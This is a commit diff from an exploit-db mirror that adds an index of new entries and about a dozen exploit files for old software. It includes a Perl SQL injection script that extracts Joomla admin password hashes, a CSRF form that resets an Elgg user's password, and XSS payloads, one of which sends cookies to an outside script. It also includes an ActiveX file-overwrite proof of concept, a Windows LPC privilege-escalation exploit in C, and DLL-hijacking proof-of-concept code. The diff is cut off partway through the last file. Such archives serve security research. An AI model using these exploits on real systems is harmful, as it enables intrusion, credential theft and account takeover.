bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 10_02_2014

Browse source
This commit is contained in:
Offensive Security 2014-10-02 04:44:52 +00:00
parent 501c894288
commit 2a66404f6b
15 changed files with 809 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -31348,3 +31348,17 @@ id,file,description,date,author,platform,type,port
34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Include Vulnerability",2014-09-29,Vulnerability-Lab,ios,webapps,0 34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Include Vulnerability",2014-09-29,Vulnerability-Lab,ios,webapps,0
34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange IIS HTTP Internal IP Address Disclosure",2014-09-29,"Nate Power",windows,webapps,0 34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange IIS HTTP Internal IP Address Disclosure",2014-09-29,"Nate Power",windows,webapps,0
34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - CSRF Vulnerability",2014-09-29,"Dolev Farhi",php,webapps,446 34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - CSRF Vulnerability",2014-09-29,"Dolev Farhi",php,webapps,446
34820,platforms/php/webapps/34820.pl,"Joomla Club Manager Component 'cm_id' Parameter SQL Injection Vulnerability",2010-10-06,FL0RiX,php,webapps,0
34821,platforms/windows/remote/34821.txt,"InstallShield 2009 15.0.0.53 Premier 'ISWiAutomation15.dll' ActiveX Arbitrary File Overwrite Vulnerability",2009-09-15,the_Edit0r,windows,remote,0
34822,platforms/windows/local/34822.c,"Microsoft Windows Local Procedure Call (LPC) Local Privilege Escalation Vulnerability",2010-09-07,yuange,windows,local,0
34823,platforms/windows/remote/34823.c,"Dupehunter Professional 9.0.0.3911 'Fwpuclnt.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-08,anT!-Tr0J4n,windows,remote,0
34824,platforms/php/webapps/34824.txt,"Lantern CMS '11-login.asp' Cross Site Scripting Vulnerability",2010-10-08,"High-Tech Bridge SA",php,webapps,0
34825,platforms/php/webapps/34825.html,"Curverider Elgg 1.0 Templates HTML Injection Vulnerability",2009-06-22,lorddemon,php,webapps,0
34826,platforms/php/webapps/34826.html,"OPEN IT OverLook 5 'title.php' Cross Site Scripting Vulnerability",2010-10-08,"Anatolia Security",php,webapps,0
34827,platforms/php/webapps/34827.txt,"Recipe Script 5.0 'First Name' HTML Injection",2009-06-15,"ThE g0bL!N",php,webapps,0
34828,platforms/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 Cross Site Scripting Vulnerabilities",2010-10-06,"High-Tech Bridge SA",php,webapps,0
34829,platforms/windows/remote/34829.c,"Adobe Dreamweaver CS4 'mfc80esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
34830,platforms/windows/remote/34830.c,"IsoBuster 2.7 'wnaspi32.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
34831,platforms/windows/remote/34831.c,"NetStumbler 0.4 'mfc71esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
34832,platforms/windows/remote/34832.c,"Microsoft Visio 2007 'mfc80esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
34833,platforms/php/webapps/34833.txt,"Joomla! and Mambo 'com_trade' Component 'PID' Parameter Cross Site Scripting Vulnerability",2010-10-11,FL0RiX,php,webapps,0

Can't render this file because it is too large.

33
platforms/php/webapps/34820.pl Executable file
View file

@ -0,0 +1,33 @@
source: http://www.securityfocus.com/bid/43821/info
The Club Manager component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#!/usr/bin/perl -w
########################################
#[~] Author : Fl0riX
#[!] Script Name: Joomla com_clubmanager
########################################
print "\t\t \n\n";
print "\t\t Fl0rix | Bug Researchers \n\n";
print "\t\t \n\n";
print "\t\t Joomla com_clubmanager Remote SQL Injection Exploit \n\n";
use LWP::UserAgent;
print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
chomp(my $target=<STDIN>);
$florix="concat(username,0x3a,password)";
$sakkure="jos_users";
$com="com_clubmanager";
$cw="+UNION+SELECT+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=".$com."&tabla=equip&task=presenta&cm_id=284".$cw."1,".$florix.",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/".$sakkure."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Baba Buyuksun bea Bu is bu kadar xD #\n\n";
}
else{print "\n[-] Malesef Olmadi Aga bir dahaki sefere\n";
}

7
platforms/php/webapps/34824.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43865/info
Lantern CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/www/html/11-login.asp?intPassedLocationID=57%27%22%3E%3Cscript%3Ealert%2834%29%3C/script%3E

11
platforms/php/webapps/34825.html Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/43871/info
Elgg is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Exploits require the attacker be an authenticated user; this permission may be trivial to acquire.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Elgg 1.0 is vulnerable; other versions may also be affected.
<body onload="document.forms.g.submit();"> <iframe name="my_frame" ALING="BOTTOM" scrolling=no width=1 heigth=1></iframe> <form method="POST" target="my_frame" action="http://www.example.com/_userdetails/index.php" name="g" id="g"> <input type=hidden name="name" value=""> <input type=hidden name="email" value=""> <input type=hidden name="moderation" value="no"> <input type=hidden name="publiccoments" value="no"> <input type=hidden name="receivenotifications" value="no"> <input type=hidden name="password1" value="password"> <------ Eye with this <input type=hidden name="password2" value="password"> <------ Eye with this <input type=hidden name="flag[commentwall_access]" value="LOGGED_IN"> <input type=hidden name="lang" value=""> <input type=hidden name="flag[sidebarsidebar-profile]" value="yes"> <input type=hidden name="flag[sidebarsidebar-communities]" value="yes"> <input type=hidden name="flag[sidebarsidebar-blog]" value="yes"> <input type=hidden name="flag[sidebarsidebar-friends]" value="yes"> <input type=hidden name="visualeditor" value="yes"> <input type=hidden name="action" value="userdetails:update"> <input type=hidden name="id" value="id_victima"> <---------Eye with this <input type=hidden name="profile_id" value="id_victima"> <---------Eye with this </form>

9
platforms/php/webapps/34826.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43872/info
OverLook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
OverLook 5.0 is vulnerable; prior versions may also be affected.
<!-- -*-*- ANATOLIA SECURITY (c) 2010 -*-*- $ Title: Proof of Concept Code for OverLook v5 Cross-site Scripting Vuln. $ ADV-ID: 2010-002 $ ADV-URL: http://www.anatoliasecurity.com/adv/as-adv-2010-002.txt $ Technical Details: http://www.anatoliasecurity.com/advisories/overlook-xss * PoC created by Eliteman ~ mail: eliteman [~AT~] anatoliasecurity [~DOT~] com ~ web: elite.anatoliasecurity.com --> <html> <head> <title> OverLook v5.0 Cross-site Scripting </title> </head> <body> <form action="http://target/overlook/title.php" method="get"> <input type="hidden" name="frame" value=""><script>alert(/1337/)</script><--"> </form> <script type="text/javascript"> document.forms[0].submit(); </script> </body> </html>

9
platforms/php/webapps/34827.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43888/info
Recipe Script is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Recipe Script 5.0 is vulnerable; other versions may also be affected.
<script>document.location ="http://localhost/[path]/cookie.php?cookie=" + document.cookie;</script>

12
platforms/php/webapps/34828.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/43910/info
Backbone Technology Expression is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Backbone Technology Expression 18.09.2010 is vulnerable; other versions may also be affected.
http://www.example.com/?section_copy_id=1005176%27%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
http://www.example.com/?section_id=1002815%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

7
platforms/php/webapps/34833.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43915/info
The 'com_trade' component for Joomla! and Mambo is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?option=com_trade&task=product_info&Itemid=florix&PID=[XSS]

469
platforms/windows/local/34822.c Executable file
View file

@ -0,0 +1,469 @@
source: http://www.securityfocus.com/bid/43860/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
A local attacker can exploit this issue to execute arbitrary code and elevate their privileges to the NetworkService account level. Failed exploit attempts may cause a denial-of-service condition.
The issue affects Microsoft Windows XP SP3; other versions may also be affected.
#include <windows.h>
#include <stdio.h>
//#include "ntdll.h"
//#pragma comment(lib,"ntdll.lib")
#pragma comment(lib,"advapi32.lib")
typedef enum _PROCESSINFOCLASS {
ProcessDebugPort=7// 7 Y Y
} PROCESSINFOCLASS;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING ,*PUNICODE_STRING;
typedef struct _CLIENT_ID
{
HANDLE UniqueProcess;
HANDLE UniqueThread;
}CLIENT_ID,* PCLIENT_ID, **PPCLIENT_ID;
#define PORT_NAME_LEN 64
#define LRPC_CONNECT_REQUEST 0
#define LPC_CONNECTION_REQUEST 10
#define offset 0x100+0x4-0x6*4
#define MAXLEN 0x148
#define BACKNAME L"\\RPC Control\\back2"
#define RPCLPCNAME L"\\RPC Control\\epmapper"
#define BINDNAME L"back2"
typedef struct _LRPC_BIND_EXCHANGE
{
INT ConnectType ;
DWORD AssocKey ;
char szPortName[PORT_NAME_LEN] ;
RPC_SYNTAX_IDENTIFIER InterfaceId;
RPC_SYNTAX_IDENTIFIER TransferSyntax;
RPC_STATUS RpcStatus;
unsigned char fBindBack ;
unsigned char fNewSecurityContext ;
unsigned char fNewPresentationContext;
unsigned char PresentationContext;
unsigned char Pad[3];
unsigned long SecurityContextId;
} LRPC_BIND_EXCHANGE;
typedef struct _LPC_MESSAGE
{
USHORT DataSize;
USHORT MessageSize;
USHORT MessageType;
USHORT DataInfoOffset;
CLIENT_ID ClientId;
ULONG MessageId;
ULONG SectionSize;
// UCHAR & nbsp; Data[];
}LPC_MESSAGE, *PLPC_MESSAGE;
typedef struct _OBJECT_ATTRIBUTES
{
DWORD Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
DWORD Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES, **PPOBJECT_ATTRIBUTES;
typedef
DWORD
(CALLBACK * NTCREATEPORT)(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxConnectInfoLength,
IN ULONG MaxDataLength,
IN OUT PULONG Reserved OPTIONAL );
typedef
DWORD
(CALLBACK * NTREPLYWAITRECVIVEPORT)(
IN HANDLE PortHandle,
OUT PHANDLE ReceivePortHandle OPTIONAL,
IN PLPC_MESSAGE Reply OPTIONAL,
OUT PLPC_MESSAGE IncomingRequest );
typedef
DWORD
(CALLBACK * NTACCEPTCONNECTPORT) (
OUT PHANDLE PortHandle,
IN PVOID PortContext OPTIONAL,
IN PLPC_MESSAGE ConnectionRequest,
IN BOOLEAN AcceptConnection,
IN OUT int int1, // IN OUT PPORT_VIEW ServerView OPTIONAL,
OUT int int2 //OUT PREMOTE_PORT_VIEW ClientView OPTIONAL
);
typedef
DWORD
(CALLBACK * NTCONNECTPORT)(
OUT PHANDLE PortHandle,
IN PUNICODE_STRING PortName,
IN PSECURITY_QUALITY_OF_SERVICE SecurityQos,
IN OUT int int1,
// IN OUT PPORT_VIEW ClientView OPTIONAL,
IN OUT int int2,
// IN OUT PREMOTE_PORT_VIEW ServerView OPTIONAL,
OUT PULONG MaxMessageLength OPTIONAL,
IN OUT PVOID ConnectionInformation OPTIONAL,
IN OUT PULONG ConnectionInformationLength OPTIONAL
);
typedef
DWORD
(CALLBACK *NTREQUESTWAITREPLYPORT)( // NtRequestWaitReplyPort(
IN HANDLE PortHandle,
IN PLPC_MESSAGE Request,
OUT PLPC_MESSAGE IncomingReply );
typedef
DWORD
(CALLBACK *NTCOMPLETECONNECTPORT) (
IN HANDLE PortHandle
);
typedef
DWORD
(CALLBACK *RTLINITUNICODESTRING)(
PUNICODE_STRING DestinationString,
PCWSTR SourceString
);
typedef
DWORD
(CALLBACK * NTREPLYPORT)(
IN HANDLE PortHandle,
IN PLPC_MESSAGE Reply );
typedef
DWORD
(CALLBACK * NTSETINFORMATIONPROCESS)(
IN HANDLE ProcessHandle,
IN PROCESSINFOCLASS ProcessInformationClass,
IN PVOID ProcessInformation,
IN ULONG ProcessInformationLength );
typedef struct _DEBUG_MESSAGE
{
LPC_MESSAGE PORT_MSG;
DEBUG_EVENT DebugEvent;
}DEBUG_MESSAGE, *PDEBUG_MESSAGE;
NTSETINFORMATIONPROCESS NtSetInformationProcess;
NTREPLYWAITRECVIVEPORT NtReplyWaitReceivePort;
NTCREATEPORT NtCreatePort;
NTREPLYPORT NtReplyPort;
NTCONNECTPORT NtConnectPort;
RTLINITUNICODESTRING RtlInitUnicodeString;
NTREQUESTWAITREPLYPORT NtRequestWaitReplyPort;
NTACCEPTCONNECTPORT NtAcceptConnectPort;
NTCOMPLETECONNECTPORT NtCompleteConnectPort;
template <int i> struct PORT_MESSAGEX : LPC_MESSAGE {
UCHAR Data[i];
};
PROCESS_INFORMATION pi;
int server();
void initapi();
int main()
{
// LPC_MESSAGE Reply;
// HMODULE hNtdll;
// DWORD dwAddrList[9];
BOOL bExit = FALSE;
// DWORD dwRet;
// HANDLE hPort;
int k=0;
unsigned long i;
// DEBUG_MESSAGE dm;
OBJECT_ATTRIBUTES oa = {sizeof(oa)};
PORT_MESSAGEX<0x130> PortReply,PortRecv;
STARTUPINFO si={sizeof(si)};
// NTSTATUS
int Status;
PLPC_MESSAGE Request;
// PLPC_MESSAGE IncomingReply;
LPC_MESSAGE Message;
HANDLE LsaCommandPortHandle;
UNICODE_STRING LsaCommandPortName;
SECURITY_QUALITY_OF_SERVICE DynamicQos;
LRPC_BIND_EXCHANGE BindExchange;
DWORD Key=0x11223344;
unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE);
BindExchange.ConnectType = LRPC_CONNECT_REQUEST ;
BindExchange.AssocKey = Key;
// wcscpy((wchar_t *)&(BindExchange.szPortName),BINDNAME);
DynamicQos.ImpersonationLevel =SecurityAnonymous; // SecurityImpersonation;
DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING; //SECURITY_DYNAMIC_TRACKING;
DynamicQos.EffectiveOnly = TRUE;
initapi();
printf( "\r\nwindows lpc test!\r\n");
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)server,0,0,&i);
//
// Connect to the Reference Monitor Command Port. This port
// is used to send commands from the LSA to the Reference Monitor.
//
RtlInitUnicodeString( &LsaCommandPortName,RPCLPCNAME);
Status = NtConnectPort(
&LsaCommandPortHandle,
&LsaCommandPortName,
&DynamicQos,
NULL,
NULL,
NULL, // &maxlen,
&BindExchange,
&Bi ndExchangeLength);
if ((Status)) {
exit(Status);
//print(("LsapRmInitializeServer - Connect to Rm Command Port failed 0x%lx\n",Status));
// goto InitServerError;
}
// exit(0);
/*
//create port
dwRet = NtCreatePort(&hPort, &oa, 0, 0x148, 0);
if(dwRet != 0)
{
printf("create hPort failed. ret=%.8X\n", dwRet);
return 0;
}
//create process
if(!CreateProcess(0, "debugme.exe", NULL, NULL, TRUE,
CREATE_SUSPENDED, 0, 0, &si, &pi))
{
printf("CreateProcess failed:%d\n", GetLastError());
return 0;
}
//set debug port
dwRet = NtSetInformationProcess(pi.hProcess, ProcessDebugPort,
&hPort, sizeof(hPo rt));
if(dwRet != 0)
{
printf("set debug port error:%.8X\n", dwRet);
return 0;
}
//printf("pid:0x%.8X %d hPort=0x%.8X\n", pi.dwProcessId, pi.dwProcessId, hPort);
ResumeThread(pi.hThread);
*/
while (true)
{
memset(&Message, 0, sizeof(Message));
Message.MessageSize=0x118;
Message.DataSize=0x100;
Message.MessageId=0x1122;
Request=&Message;
memset(&PortReply, 0, sizeof(PortReply));
// memcpy(&PortReply, &dm, sizeof(dm));
memset(&PortReply, 0, sizeof(PortReply));
// memcpy(&PortReply, &dm, sizeof(dm));
PortReply.MessageSize = 0x100;
PortReply.DataSize = 0x100-0x18;
PortReply.MessageType=0;
PortReply.MessageId=0x1122;
PortReply.Data[0]=0x0b;
PortReply.Data[1]=0;
PortReply.Data[2]=0;
PortReply.Data[3]=0;
PortReply.Data[4]=0;
wcscpy((wchar_t *)&(PortReply.Data[0x10]),BINDNAME);
Sleep(1000);
Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv); //Reply);
// memcpy(&PortReply.Data[offset-4], &dwAddrList, sizeof(dwAddrList));
PortReply.MessageSize = 0xa0;
PortReply.DataSize = 0xa0-0x18;
PortReply.MessageType=0;
PortReply.MessageId=0x1122;
PortReply.Data[0]=0x0;
PortReply.Data[1]=0;
PortReply.Data[2]=0;
PortReply.Data[3]=0;
PortReply.Data[4]=0;
memcpy((unsigned char *)&(PortReply.Data[0x0c]),
"\x80\xbd\xa8\xaf\x8a\x7d\xc9\x11\xbe\xf4\x08\x00\x2b\x10\x29\x89\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00",0x20);
//"\xe6\x73\x0c\xe6\xf9\x88\xcf\x11\x9a\xf1\x00\x20\xaf\x6e\x72\xf4\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00",0x20);
// memcpy(&PortReply.Data[offset-4], &dwAddrList, sizeof(dwAddrList));
_asm{
// die: jmp die
}
Sleep(1000);
Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv); //Reply);
BindExchange=*(LRPC_BIND_EXCHANGE *)&(PortRecv.Data[8]);
if (!(Status))
{
while(1){
PortReply.MessageSize = 0x100;
PortReply.DataSize = 0x100-0x18;
PortReply.MessageType=0;
PortReply.MessageId=PortRecv.MessageId;
PortReply.Data[0]=0x01;
PortReply.Data[1]=0;
PortReply.Data[2]=0;
PortReply.Data[3]=0;
PortReply.Data[4]=0x3;
PortReply.Data[5]=0;
PortReply.Data[6]=0;
*(int *)(&(PortReply.Data[0x18]))=*(int *)(&(PortRecv.Data[0x30]));
_asm{
// die: jmp die
}
Sleep(100);
Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv); //Reply);
Sleep(0x7fffffff);
}
}
}
return 0;
}
int server()
{
BOOL bExit = FALSE;
DWORD dwRet;
// HANDLE hPort;
int k=0;
unsigned long maxlen;
// DEBUG_MESSAGE dm;
OBJECT_ATTRIBUTES oa = {sizeof(oa)};
PORT_MESSAGEX<0x130> PortReply,PortRecv;
STARTUPINFO si={sizeof(si)};
// NTSTATUS
int Status;
PLPC_MESSAGE Request;
PLPC_MESSAGE IncomingReply;
LPC_MESSAGE Message;
HANDLE BackPortHandle,NewHandle,NewAccHandle;
UNICODE_STRING BackPortName;
SECURITY_QUALITY_OF_SERVICE DynamicQos;
LRPC_BIND_EXCHANGE BindExchange;
DWORD Key=0x11223344;
unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE);
BindExchange.ConnectType = LRPC_CONNECT_REQUEST ;
BindExchange.AssocKey = Key;
DynamicQos.ImpersonationLevel =SecurityAnonymous; // SecurityImpersonation;
DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING; //SECURITY_DYNAMIC_TRACKING;
DynamicQos.EffectiveOnly = TRUE;
RtlInitUnicodeString( &BackPortName,BACKNAME);
memset(&oa,0,sizeof(oa));
oa.Length=0x18;
oa.ObjectName=&BackPortName;
oa.Attributes=0x40;
//InitializeObjectAttributes(&oa,&BackPortName,0x40,0,0);
//OBJ_CASE_INSENSITIVE,0,0); //SecurityDescriptor);
//create port
dwRet = NtCreatePort(&BackPortHandle, &oa, sizeof(LRPC_BIND_EXCHANGE),MAXLEN, 0);
if(dwRet != 0)
{
printf("create hPort failed. ret=%.8X\n", dwRet);
// return 0;
}
while (true)
{
memset(&Message, 0, sizeof(Message));
Message.MessageSize=0x118;
Message.DataSize=0x100;
Message.MessageId=0x11;
Request=&Message;
memset(&PortReply, 0, sizeof(PortReply));
// memcpy(&PortReply, &dm, sizeof(dm));
PortReply.MessageSize = 0x148;
PortReply.DataSize = 0x130;
PortReply.MessageType=0;
PortReply.Data[0]=0x0b;
PortReply.Data[1]=0;
PortReply.Data[2]=0;
PortReply.Data[3]=0;
PortReply.Data[4]=0;
// memcpy(&PortReply.Data[offset-4], &dwAddrList, sizeof(dwAddrList));
Status=NtReplyWaitReceivePort(BackPortHandle,0,0,&PortRecv); //Reply);
if(PortRecv.MessageType==LPC_CONNECTION_REQUEST)
{
Status=NtAcceptConnectPort(&NewAccHandle, 0, &PortRecv,1, NULL, NULL);
Status=NtCompleteConnectPort (NewAccHandle);
memset(&PortRecv, 0, sizeof(PortRecv));
Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv); //&PortReply,&PortRecv);
while(1)
{
PortRecv.MessageSize = 0x148;
PortRecv.DataSize = 0x130;
// PortReply.MessageId=PortRecv.MessageId;
_asm{
//die: jmp die
}
Status=NtReplyWaitReceivePort(NewAccHandle,0,&PortRecv,&PortRecv); //&PortReply,&PortRecv);
Sleep(100);
Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv); //&PortReply,&PortRecv);
}
}
}
}
void initapi()
{
HMODULE hNtdll;
//get native api address
hNtdll = LoadLibrary("ntdll.dll");
if(hNtdll == NULL)
{
printf("LoadLibrary failed:%d\n", GetLastError());
}
NtReplyWaitReceivePort = (NTREPLYWAITRECVIVEPORT)
GetProcAddress(hNtdll, "NtReplyWaitReceivePort");
NtCreatePort = (NTCREATEPORT)
GetProcAddress(hNtdll, "NtCreatePort");
NtReplyPort = (NTREPLYPORT)
GetProcAddress(hNtdll, "NtReplyPort");
NtSetInformationProcess = (NTSETINFORMATIONPROCESS)
GetProcAddress(hNtdll, "NtSetInformationProcess");
NtRequestWaitReplyPort= (NTREQUESTWAITREPLYPORT)
GetProcAddress(hNtdll,"NtRequestWaitReplyPort");
NtConnectPort = (NTCONNECTPORT)
GetProcAddress(hNtdll, "NtConnectPort");
NtCompleteConnectPort = (NTCOMPLETECONNECTPORT)
GetProcAddress(hNtdll, "NtCompleteConnectPort");
NtAcceptConnectPort = (NTACCEPTCONNECTPORT)
GetProcAddress(hNtdll, "NtAcceptConnectPort");
RtlInitUnicodeString=(RTLINITUNICODESTRING)
GetProcAddress(hNtdll,"RtlInitUnicodeString");
}

9
platforms/windows/remote/34821.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43857/info
InstallShield 2009 Premier ActiveX control is prone to an arbitrary-file-overwrite vulnerability.
Attackers can overwrite arbitrary files on the victim's computer in the context of the vulnerable application (typically Internet Explorer) using the ActiveX control.
InstallShield 2009 Premier 15.0.0.53 is vulnerable; other versions may also be affected.
# Part Expl0it & Bug Codes ( Poc ) : ------------------------------------ <b> Installshiled 2009 premier 15.0.0.53 File Overwrite Expl0it <b/> by : the_Edit0r <b/> <b/> <object classid='clsid:34E7A6F9-F260-46BD-AAC8-1E70E22139D2' id='Edit0r'></object> <script> try{ var obj = document.InsertCustomAction('Edit0r'); obj.AddPage(1); obj.SaveToFile("C:/system_.ini"); window.alert('check C:'); } catch(err){ window.alert('Poc failed'); } </script>

48
platforms/windows/remote/34823.c Executable file
View file

@ -0,0 +1,48 @@
source: http://www.securityfocus.com/bid/43863/info
Dupehunter Professional is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
Dupehunter Professional 9.0.0.3911 is vulnerable; other versions may also be affected.
/*
#Dupehunter Professional DLL Hijacking Exploit (fwpuclnt.dll)
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
#Software Link:http://www.dupehunter.com
#Tested on: Windows XP sp3
# Home : www.Dev-PoinT.com
#####################
How TO use : Compile and rename to " fwpuclnt.dll " , create a file in the same dir with one of the following extensions.
check the result > Hack3d
#####################
#fwpuclnt.dll (code)
*/
#include "stdafx.h"
void init() {
MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "anT!-Tr0J4n",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

43
platforms/windows/remote/34829.c Executable file
View file

@ -0,0 +1,43 @@
source: http://www.securityfocus.com/bid/43911/info
Adobe Dreamweaver CS4 is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file.
/*
============================================================================
Adobe Dreamweaver CS4 - v10.0 Build 4117 DLL Hijacking Exploit (mfc80esn.dll)
=============================================================================
$ Program: Adobe Dreamweaver
$ Version: v10.0 Build 4117
$ Download: http://www.adobe.com/es/products/dreamweaver/
$ Date: 2010/10/08
Found by Pepelux <pepelux[at]enye-sec.org>
http://www.pepelux.org
eNYe-Sec - www.enye-sec.org
Tested on: Windows XP SP2 && Windows XP SP3
How to use :
1> Compile this code as mfc80esn.dll
gcc -shared -o mfc80esn.dll thiscode.c
2> Move DLL file to the directory where Dreamweaver is installed
3> Open any file recognized by Dreamweaver
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
int mes()
{
MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{mes();}

48
platforms/windows/remote/34830.c Executable file
View file

@ -0,0 +1,48 @@
source: http://www.securityfocus.com/bid/43912/info
IsoBuster is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
IsoBuster 2.7 is vulnerable; other versions may also be affected.
/*
==================================================================
IsoBuster v2.7 (Build 2.7.0.0) DLL Hijacking Exploit (wnaspi32.dll)
===================================================================
$ Program: IsoBuster
$ Version: v2.7 (Build 2.7.0.0)
$ Download: http://www.isobuster.com/
$ Date: 2010/10/08
Found by Pepelux <pepelux[at]enye-sec.org>
http://www.pepelux.org
eNYe-Sec - www.enye-sec.org
Tested on: Windows XP SP2 && Windows XP SP3
Extensions: " .rar && .r00 ... .r99 && .zoo "
How to use :
1> Compile this code as wnaspi32.dll
gcc -shared -o wnaspi32.dll thiscode.c
2> Move DLL file to the directory where IsoBuster is installed
3> Open any file recognized by isobuster
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
int mes()
{
MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{mes();}

45
platforms/windows/remote/34831.c Executable file
View file

@ -0,0 +1,45 @@
source: http://www.securityfocus.com/bid/43913/info
NetStumbler is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
NetStumbler 0.4.0 is vulnerable; other versions may also be affected.
/*
=========================================================
NetStumbler - v0.4.0 DLL Hijacking Exploit (mfc71esn.dll)
=========================================================
$ Program: NetStumbler
$ Version: 0.4.0
$ Download: http://www.netstumbler.com/
$ Date: 2010/10/08
